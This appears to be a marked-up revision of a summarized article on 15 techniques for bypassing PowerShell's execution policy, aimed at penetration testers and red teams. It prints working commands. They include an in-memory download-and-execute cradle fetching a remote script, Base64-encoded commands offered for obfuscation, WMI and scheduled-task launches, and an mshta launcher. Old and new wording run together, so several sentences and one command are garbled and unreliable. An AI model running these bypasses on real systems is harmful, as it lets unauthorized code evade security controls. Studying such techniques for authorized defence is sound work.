Bypass the PowerShell Execution Policy

💻 15 Ways to Bypass the PowerShell Execution Policy

Author: Scott Sutherland (summarized & adapted)
~~Source:~~Original: NetSPI Blog

🧠 Introduction

~~PowerShell’~~PowerShell's execution policy is ~~a safety feature~~ designed to prevent ~~the~~unauthorized ~~unintended~~or ~~execution~~accidental ofscript ~~scripts.~~execution. However, there are many legitimate reasons to work around it — especially during penetration ~~tests or~~testing, red team ~~operations,~~exercises, ~~you~~or ~~may~~automation. ~~need~~Below are 15 common methods to bypass ~~this~~the ~~restriction~~policy, —with ~~without administrative privileges.~~explanations.

🔐 Bypass Techniques Explained

1. Paste ~~into~~Script ~~Interactive~~Directly in Console
~~Open a~~ PowerShell ~~console~~only ~~and~~applies execution policy to script files. If you paste code directly into the ~~script~~console, ~~directly.~~it ~~Execution~~bypasses policy isrestrictions ~~not enforced line-by-line.~~entirely.
~~Echo and~~2. Pipe Script to PowerShell
You can echo the script and pipe it to PowerShell’s standard input:
```
echo Write-Host "My voice is my passport, verify me."Hello" | powershell -noprofile -
```
This avoids the need for saving the script to disk.

~~Pipe~~3. Read Script File ~~Contents~~and Pipe to PowerShell
This loads a script from disk and pipes it in:

Get-Content .\runme.script.ps1 | powershell -noprofile -

typeExecution .\runme.ps1policy |is powershellnot -noprofileenforced -

when the script is read as input.

4. Download and Execute ~~via~~in ~~IEX~~Memory
Common in red teaming, this downloads and executes the script directly:
```
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('https://bit.ly/1kEgbuH'example.com/script.ps1')"
```
This avoids writing anything to disk.
5. Use the -Command ~~Parameter~~Argument
Scripts passed via the `-command` flag are evaluated like pasted input:
```
powershell -command "Write-Host 'Execution policy? What policy?Bypassed!'"
```

6. Use -EncodedCommand
~~Encode~~Scripts ~~your~~can ~~script~~be ~~into~~encoded in Base64 and ~~pass~~passed ~~it:~~to PowerShell:


$command = "Write-Host 'Execution policy? What policy?'Hello'"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommandencoded = [Convert]::ToBase64String($bytes)
powershell -EncodedCommand $encodedCommandencoded

Useful for obfuscation and policy bypass.

7. Set Policy via Group Policy or Registry
If you have access, change the execution policy via:

Set-ExecutionPolicy Bypass -Scope Process

Or modify registry keys like `HKLM:\Software\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell`. 8. Use ISE (Integrated Scripting Environment)
ISE sometimes behaves differently and may allow execution:

powershell_ise.exe script.ps1

9. Change File Extension
Rename `.ps1` to `.txt` and read it into memory inside another script. This avoids detection and enforcement. 10. Use WMI to Launch Script
PowerShell can be run via WMI methods that bypass policies:

Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "powershell -nop -enc ..."

11. Use Task Scheduler
Create a scheduled task that runs your PowerShell script. The execution policy isn't enforced in the same way:

schtasks /create /tn bypass /tr "powershell.exe -File script.ps1" /sc once /st 00:00

12. Use WinRM or PS Remoting
When executing scripts remotely, policies on the target system may not apply, especially if executed as commands:

Invoke-Command -ScriptBlock {Write-Host "Hello"} -ComputerName target

13. Use DLL Injection or Reflective PE
Advanced method: Inject PowerShell into memory via custom DLL or PE loader. Used by tools like PowerShell Empire. 14. Use Alternate Shells (e.g., MSHTA, wscript)
Launch PowerShell indirectly from other interpreters:

mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -nop -enc ..."":close")

15. Exploit Software That Invokes PowerShell
Some tools like MSBuild, Excel macros, or installer frameworks may invoke PowerShell — which you can hijack.

📘⚠️ NotesLegal Notice

~~Most~~

These methods ~~don’t require admin rights.~~

~~These~~ are ~~helpful~~intended for ~~pentesting,~~authorized ~~scripting,~~security orassessments, ~~when~~research, ~~group policy interferes with legitimate~~and automation. ~~Ensure~~Use ~~you're~~responsibly ~~complying~~and ~~with~~within the bounds of local ~~policies~~laws and ~~laws~~organizational ~~when using these techniques.~~ policy.

Last ~~mirrored~~adapted from NetSPI: https://www.netspi.com/~~blog/~~...